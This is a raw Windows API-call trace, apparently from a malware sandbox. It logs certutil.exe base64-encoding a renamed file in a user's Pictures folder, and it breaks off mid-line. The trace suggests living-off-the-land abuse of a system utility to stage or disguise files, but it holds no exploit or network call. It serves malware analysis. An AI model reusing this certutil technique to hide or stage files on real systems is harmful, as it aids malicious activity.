[0300.107] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0300.107] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0300.107] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0300.107] WerSetFlags () returned 0x0 [0300.108] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0300.108] __iob_func () returned 0x7ffcea2dea00 [0300.108] _fileno (_File=0x7ffcea2dea30) returned 1 [0300.108] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0300.108] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0300.109] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0300.109] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0300.109] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0300.109] GetConsoleOutputCP () returned 0x1b5 [0300.109] _vsnwprintf (in: _Buffer=0x230567fb20, _BufferCount=0xb, _Format=".%d", _ArgList=0x230567fa48 | out: _Buffer=".437") returned 4 [0300.110] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0300.110] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0300.110] GetFileType (hFile=0x50) returned 0x2 [0300.110] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0300.110] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0300.110] SetThreadUILanguage (LangId=0x0) returned 0x409 [0300.110] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0300.110] GetCommandLineW () returned="certutil -encode \"lrXVOGLmm_sYY.png.Sister\" \"lrXVOGLmm_sYY.png.Cruel\"" [0300.110] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1c2cec3ba20 [0300.111] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1c2cec2cac0 [0300.111] LocalFree (hMem=0x1c2cec3ba20) returned 0x0 [0300.111] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1c2cec31f90 [0300.111] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x1c2cec31e70 [0300.111] LocalFree (hMem=0x1c2cec31f90) returned 0x0 [0300.111] LocalFree (hMem=0x1c2cec2cac0) returned 0x0 [0300.111] LocalFree (hMem=0x0) returned 0x0 [0300.111] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0300.111] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0300.112] GetCommandLineW () returned="certutil -encode \"lrXVOGLmm_sYY.png.Sister\" \"lrXVOGLmm_sYY.png.Cruel\"" [0300.112] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1c2cec3b820 [0300.112] GetSystemTime (in: lpSystemTime=0x230567f810 | out: lpSystemTime=0x230567f810*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x32, wSecond=0xe, wMilliseconds=0x28c)) [0300.112] SystemTimeToFileTime (in: lpSystemTime=0x230567f810, lpFileTime=0x230567f808 | out: lpFileTime=0x230567f808) returned 1 [0300.112] FileTimeToLocalFileTime (in: lpFileTime=0x230567f808, lpLocalFileTime=0x230567f7d0 | out: lpLocalFileTime=0x230567f7d0) returned 1 [0300.112] FileTimeToSystemTime (in: lpFileTime=0x230567f7d0, lpSystemTime=0x230567f540 | out: lpSystemTime=0x230567f540) returned 1 [0300.112] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x230567f540, lpFormat=0x0, lpDateStr=0x230567f650, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0300.112] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x230567f540, lpFormat=0x0, lpTimeStr=0x230567f550, cchTime=128 | out: lpTimeStr="8:50 PM") returned 8 [0300.112] _vsnwprintf (in: _Buffer=0x230567f55e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x230567f528 | out: _Buffer=" 14.652s") returned 8 [0300.112] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x1c2cec3e000 [0300.112] SetLastError (dwErrCode=0x80070716) [0300.112] _vsnwprintf (in: _Buffer=0x230567f5d8, _BufferCount=0xb, _Format="%d", _ArgList=0x230567f5c8 | out: _Buffer="948") returned 3 [0300.112] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x230567f390, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0300.112] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x1c2cec3b900 [0300.112] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x1c2cec2cd10 [0300.112] LocalFree (hMem=0x1c2cec3e000) returned 0x0 [0300.113] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x230567f880 | out: lpSystemTimeAsFileTime=0x230567f880*(dwLowDateTime=0xdd7d54b6, dwHighDateTime=0x1d6141f)) [0300.113] GetLocalTime (in: lpSystemTime=0x230567f8b8 | out: lpSystemTime=0x230567f8b8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x32, wSecond=0xe, wMilliseconds=0x28c)) [0300.113] SystemTimeToFileTime (in: lpSystemTime=0x230567f8b8, lpFileTime=0x230567f890 | out: lpFileTime=0x230567f890) returned 1 [0300.113] CompareFileTime (lpFileTime1=0x230567f890, lpFileTime2=0x230567f880) returned 1 [0300.113] _vsnwprintf (in: _Buffer=0x230567f8c8, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x230567f858 | out: _Buffer="GMT + 2.00") returned 10 [0300.113] LocalFree (hMem=0x1c2cec3b820) returned 0x0 [0300.113] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde670000 [0300.113] FindResourceW (hModule=0x7ffcde670000, lpName=0x1, lpType=0x10) returned 0x7ffcde730090 [0300.113] LoadResource (hModule=0x7ffcde670000, hResInfo=0x7ffcde730090) returned 0x7ffcde7300b0 [0300.113] LockResource (hResData=0x7ffcde7300b0) returned 0x7ffcde7300b0 [0300.113] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0300.113] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x230567f8f8 | out: _Buffer="10.0.15063.447") returned 14 [0300.113] GetACP () returned 0x4e4 [0300.113] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0300.113] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1c2cec3bb40 [0300.113] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1c2cec3bb40, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0300.113] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1c2cec3e400 [0300.113] _vsnwprintf (in: _Buffer=0x1c2cec3e400, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x230567f948 | out: _Buffer="10.0.15063.447 retail") returned 21 [0300.113] LocalFree (hMem=0x1c2cec3bb40) returned 0x0 [0300.113] LocalFree (hMem=0x0) returned 0x0 [0300.114] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0300.114] GetACP () returned 0x4e4 [0300.114] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0300.114] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1c2cec3bb60 [0300.114] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1c2cec3bb60, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0300.114] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1c2cec3e300 [0300.114] _vsnwprintf (in: _Buffer=0x1c2cec3e300, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x230567f948 | out: _Buffer="10.0.15063.447 retail") returned 21 [0300.114] LocalFree (hMem=0x1c2cec3bb60) returned 0x0 [0300.114] LocalFree (hMem=0x0) returned 0x0 [0300.114] GetACP () returned 0x4e4 [0300.114] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0300.114] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1c2cec3b520 [0300.114] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1c2cec3b520, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0300.114] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1c2cec3e480 [0300.114] _vsnwprintf (in: _Buffer=0x1c2cec3e480, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x230567f978 | out: _Buffer="10.0.15063.447 retail") returned 21 [0300.114] LocalFree (hMem=0x1c2cec3b520) returned 0x0 [0300.114] LocalFree (hMem=0x1c2cec3e400) returned 0x0 [0300.114] LocalFree (hMem=0x1c2cec3e300) returned 0x0 [0300.114] LocalFree (hMem=0x1c2cec3e480) returned 0x0 [0300.114] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0300.114] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0300.114] GetStockObject (i=0) returned 0x900010 [0300.114] RegisterClassW (lpWndClass=0x230567faa0) returned 0xc1a2 [0300.115] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x2702c8 [0300.127] NtdllDefWindowProc_W () returned 0x0 [0300.127] NtdllDefWindowProc_W () returned 0x1 [0300.132] NtdllDefWindowProc_W () returned 0x0 [0300.139] UpdateWindow (hWnd=0x2702c8) returned 1 [0300.139] PostMessageW (hWnd=0x2702c8, Msg=0x400, wParam=0x0, lParam=0x1c2cec2217e) returned 1 [0300.139] GetMessageW (in: lpMsg=0x230567faf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x230567faf0) returned 1 [0300.139] TranslateMessage (lpMsg=0x230567faf0) returned 0 [0300.139] DispatchMessageW (lpMsg=0x230567faf0) returned 0x0 [0300.139] NtdllDefWindowProc_W () returned 0x0 [0300.139] GetMessageW (in: lpMsg=0x230567faf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x230567faf0) returned 1 [0300.139] TranslateMessage (lpMsg=0x230567faf0) returned 0 [0300.139] DispatchMessageW (lpMsg=0x230567faf0) returned 0x0 [0300.139] LocalAlloc (uFlags=0x0, uBytes=0x7a) returned 0x1c2cec26040 [0300.139] LocalAlloc (uFlags=0x0, uBytes=0x86) returned 0x1c2cec24400 [0300.140] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0300.140] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0300.140] SetLastError (dwErrCode=0x80070716) [0300.140] _vsnwprintf (in: _Buffer=0x230567f4f8, _BufferCount=0xb, _Format="%d", _ArgList=0x230567f4e8 | out: _Buffer="465") returned 3 [0300.140] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x230567f2b0, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0300.140] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1c2cec31ff0 [0300.140] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0300.140] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0300.140] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x230567f290, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0300.140] GetLastError () returned 0xcb [0300.140] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0300.140] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0300.140] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0300.140] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0300.140] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0300.140] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0300.141] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0300.141] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0300.141] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0300.141] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0300.141] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0300.141] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0300.141] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0300.141] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0300.141] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0300.141] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0300.141] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0300.141] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0300.141] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0300.141] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0300.141] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0300.141] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x230567ef58 | out: phkResult=0x230567ef58*=0x23c) returned 0x0 [0300.141] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x1c2cec2d360 [0300.141] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x230567f4c8, lpData=0x230567f4f8, lpcbData=0x230567f4c0*=0x4 | out: lpType=0x230567f4c8*=0x0, lpData=0x230567f4f8*=0x0, lpcbData=0x230567f4c0*=0x4) returned 0x2 [0300.141] LocalFree (hMem=0x1c2cec2d360) returned 0x0 [0300.141] RegCloseKey (hKey=0x23c) returned 0x0 [0300.141] LocalFree (hMem=0x0) returned 0x0 [0300.141] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x1c2cec4c4f0 [0300.151] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0300.151] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0300.152] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0300.152] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0300.152] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0300.152] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0300.152] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0300.152] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0300.152] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0300.152] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0300.152] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0300.152] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0300.152] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0300.152] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0300.152] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0300.152] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0300.152] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x1c2cec50900 [0300.152] GetComputerNameW (in: lpBuffer=0x1c2cec50900, nSize=0x230567f4c0 | out: lpBuffer="NQDPDE", nSize=0x230567f4c0) returned 1 [0300.152] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x230567f490 | out: lpBuffer=0x0, nSize=0x230567f490) returned 0 [0300.153] GetLastError () returned 0xea [0300.153] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1c2cec3b600 [0300.153] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x1c2cec3b600, nSize=0x230567f490 | out: lpBuffer="NQdPdE", nSize=0x230567f490) returned 1 [0300.153] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0300.156] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x1c2cec50a00, cbCertEncoded=0x1770f) returned 0x0 [0300.161] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x1c2cec50a00, cbCrlEncoded=0x1770f) returned 0x0 [0300.164] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x1c2cec50a00, cbEncoded=0x1770f, dwFlags=0x8000, pDecodePara=0x230567f370, pvStructInfo=0x230567f400, pcbStructInfo=0x230567f3f4 | out: pvStructInfo=0x230567f400, pcbStructInfo=0x230567f3f4) returned 0 [0300.164] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x1c2cec50a00, cbEncoded=0x1770f, dwFlags=0x8000, pDecodePara=0x230567f370, pvStructInfo=0x230567f400, pcbStructInfo=0x230567f3f4 | out: pvStructInfo=0x230567f400, pcbStructInfo=0x230567f3f4) returned 0 [0300.164] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x1c2cec50a00, cbEncoded=0x1770f, dwFlags=0x8000, pDecodePara=0x230567f370, pvStructInfo=0x230567f400, pcbStructInfo=0x230567f3f4 | out: pvStructInfo=0x230567f400, pcbStructInfo=0x230567f3f4) returned 0 [0300.164] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x1c2cec35630 [0300.173] CryptMsgUpdate (hCryptMsg=0x1c2cec35630, pbData=0x1c2cec50a00, cbData=0x1770f, fFinal=1) returned 0 [0300.173] GetLastError () returned 0x8009310b [0300.173] CryptMsgClose (hCryptMsg=0x1c2cec35630) returned 1 [0300.173] GetFileAttributesExW (in: lpFileName="lrXVOGLmm_sYY.png.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\lrxvoglmm_syy.png.sister"), fInfoLevelId=0x0, lpFileInformation=0x230567f420 | out: lpFileInformation=0x230567f420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17cf8d10, ftCreationTime.dwHighDateTime=0x1d5e65e, ftLastAccessTime.dwLowDateTime=0xbb62ea60, ftLastAccessTime.dwHighDateTime=0x1d5eac0, ftLastWriteTime.dwLowDateTime=0xbb62ea60, ftLastWriteTime.dwHighDateTime=0x1d5eac0, nFileSizeHigh=0x0, nFileSizeLow=0x1770f)) returned 1 [0300.173] _vsnwprintf (in: _Buffer=0x230567f428, _BufferCount=0xb, _Format="%d", _ArgList=0x230567f418 | out: _Buffer="359") returned 3 [0300.173] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x230567f1e0, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0300.173] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1c2cec507b0 [0300.173] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0300.173] _vsnwprintf (in: _Buffer=0x230567e410, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x230567f468 | out: _Buffer="Input Length = 96015") returned 20 [0300.173] GetFileType (hFile=0x50) returned 0x2 [0300.173] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x230567e410*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x230567e3c4, lpReserved=0x0 | out: lpBuffer=0x230567e410*, lpNumberOfCharsWritten=0x230567e3c4*=0x14) returned 1 [0300.174] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0300.174] _vsnwprintf (in: _Buffer=0x230567e410, _BufferCount=0x1ff, _Format="\n", _ArgList=0x230567f468 | out: _Buffer="\n") returned 1 [0300.174] GetFileType (hFile=0x50) returned 0x2 [0300.175] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x230567e410*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x230567e3c4, lpReserved=0x0 | out: lpBuffer=0x230567e410*, lpNumberOfCharsWritten=0x230567e3c4*=0x1) returned 1 [0300.794] GetFileAttributesExW (in: lpFileName="lrXVOGLmm_sYY.png.Cruel" (normalized: "c:\\users\\fd1hvy\\pictures\\lrxvoglmm_syy.png.cruel"), fInfoLevelId=0x0, lpFileInformation=0x230567f420 | out: lpFileInformation=0x230567f420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd88511a, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xdd88511a, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdde53e08, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x203ee)) returned 1 [0300.794] _vsnwprintf (in: _Buffer=0x230567f428, _BufferCount=0xb, _Format="%d", _ArgList=0x230567f418 | out: _Buffer="361") returned 3 [0300.794] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x230567f1e0, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0300.794] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x1c2cec50960 [0300.794] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0300.794] _vsnwprintf (in: _Buffer=0x230567e410, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x230567f468 | out: _Buffer="Output Length = 132078") returned 22 [0300.794] GetFileType (hFile=0x50) returned 0x2 [0300.794] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x230567e410*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x230567e3c4, lpReserved=0x0 | out: lpBuffer=0x230567e410*, lpNumberOfCharsWritten=0x230567e3c4*=0x16) returned 1 [0300.795] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0300.796] _vsnwprintf (in: _Buffer=0x230567e410, _BufferCount=0x1ff, _Format="\n", _ArgList=0x230567f468 | out: _Buffer="\n") returned 1 [0300.796] GetFileType (hFile=0x50) returned 0x2 [0300.796] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x230567e410*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x230567e3c4, lpReserved=0x0 | out: lpBuffer=0x230567e410*, lpNumberOfCharsWritten=0x230567e3c4*=0x1) returned 1 [0300.799] LocalFree (hMem=0x1c2cec50a00) returned 0x0 [0300.799] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0300.799] _vsnwprintf (in: _Buffer=0x230567f488, _BufferCount=0xb, _Format="%d", _ArgList=0x230567f478 | out: _Buffer="2022") returned 4 [0300.799] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x230567f240, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0300.799] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x1c2cec29a10 [0300.799] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0300.800] _vsnwprintf (in: _Buffer=0x230567e470, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x230567f4c8 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0300.800] GetFileType (hFile=0x50) returned 0x2 [0300.800] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x230567e470*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x230567e424, lpReserved=0x0 | out: lpBuffer=0x230567e470*, lpNumberOfCharsWritten=0x230567e424*=0x31) returned 1 [0300.800] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0300.800] _vsnwprintf (in: _Buffer=0x230567e470, _BufferCount=0x1ff, _Format="\n", _ArgList=0x230567f4c8 | out: _Buffer="\n") returned 1 [0300.800] GetFileType (hFile=0x50) returned 0x2 [0300.800] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x230567e470*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x230567e424, lpReserved=0x0 | out: lpBuffer=0x230567e470*, lpNumberOfCharsWritten=0x230567e424*=0x1) returned 1 [0300.808] LocalFree (hMem=0x0) returned 0x0 [0300.808] LocalFree (hMem=0x1c2cec24400) returned 0x0 [0300.808] LocalFree (hMem=0x1c2cec26040) returned 0x0 [0300.808] SetLastError (dwErrCode=0x80070716) [0300.808] _vsnwprintf (in: _Buffer=0x230567f4f8, _BufferCount=0xb, _Format="%d", _ArgList=0x230567f4e8 | out: _Buffer="511") returned 3 [0300.808] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x230567f2b0, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0300.808] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1c2cec50810 [0300.808] PostQuitMessage (nExitCode=0) [0300.808] GetMessageW (in: lpMsg=0x230567faf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x230567faf0) returned 0 [0300.808] LocalFree (hMem=0x1c2cec3b600) returned 0x0 [0300.809] LocalFree (hMem=0x1c2cec50900) returned 0x0 [0300.809] LocalFree (hMem=0x0) returned 0x0 [0300.809] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0300.809] GetLastError () returned 0x7e [0300.809] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0300.809] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0300.809] DllMain () returned 0x1 [0300.809] LocalFree (hMem=0x1c2cec3b900) returned 0x0 [0300.809] LocalFree (hMem=0x1c2cec31ff0) returned 0x0 [0300.809] LocalFree (hMem=0x1c2cec507b0) returned 0x0 [0300.810] LocalFree (hMem=0x1c2cec50960) returned 0x0 [0300.810] LocalFree (hMem=0x1c2cec29a10) returned 0x0 [0300.810] LocalFree (hMem=0x1c2cec50810) returned 0x0 [0300.810] LocalFree (hMem=0x1c2cec2cd10) returned 0x0 [0300.810] LocalFree (hMem=0x1c2cec31e70) returned 0x0 [0300.810] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0300.810] GetLastError () returned 0x7e [0300.810] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0300.810] GetProcAddress 